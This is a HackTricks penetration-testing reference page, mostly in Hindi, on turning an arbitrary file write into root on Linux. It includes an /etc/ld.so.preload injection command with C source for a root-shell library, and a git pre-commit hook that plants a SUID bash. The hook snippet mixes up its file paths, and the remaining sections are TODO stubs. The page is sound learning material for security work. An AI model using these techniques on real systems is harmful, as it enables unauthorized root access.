Arbitrary File Write to Root

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फ़ॉलो करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

/etc/ld.so.preload

यह फ़ाइल LD_PRELOAD पर्यावरण चर की तरह व्यवहार करती है लेकिन यह SUID बाइनरीज़ में भी काम करती है। यदि आप इसे बना सकते हैं या संशोधित कर सकते हैं, तो आप बस एक पथ जोड़ सकते हैं जो एक लाइब्रेरी का होगा जिसे प्रत्येक निष्पादित बाइनरी के साथ लोड किया जाएगा।

उदाहरण: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hooks

Git hooks वे स्क्रिप्ट हैं जो एक git रिपॉजिटरी में विभिन्न घटनाओं पर चलती हैं जैसे कि जब एक कमिट बनाया जाता है, एक मर्ज... तो यदि एक विशिष्ट स्क्रिप्ट या उपयोगकर्ता ये क्रियाएँ बार-बार कर रहा है और यह संभव है कि .git फ़ोल्डर में लिखा जाए, तो इसका उपयोग privesc के लिए किया जा सकता है।

उदाहरण के लिए, यह संभव है कि एक git रिपॉजिटरी में .git/hooks में एक स्क्रिप्ट उत्पन्न की जाए ताकि यह हमेशा नए कमिट के बनने पर चल सके:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Cron & Time files

TODO

Service & Socket files

TODO

binfmt_misc

फाइल /proc/sys/fs/binfmt_misc में स्थित है जो यह दर्शाती है कि कौन सा बाइनरी किस प्रकार की फाइलों को निष्पादित करना चाहिए। TODO: एक सामान्य फाइल प्रकार खुलने पर रिवर्स शेल निष्पादित करने के लिए इसका दुरुपयोग करने की आवश्यकताओं की जांच करें।

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousLinux Privilege Escalation NextCisco - vmanage

Last updated 3 days ago

#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unlink("/etc/ld.so.preload"); setgid(0); setuid(0); system("/bin/bash"); } //cd /tmp //gcc -fPIC -shared -o pe.so pe.c -nostartfiles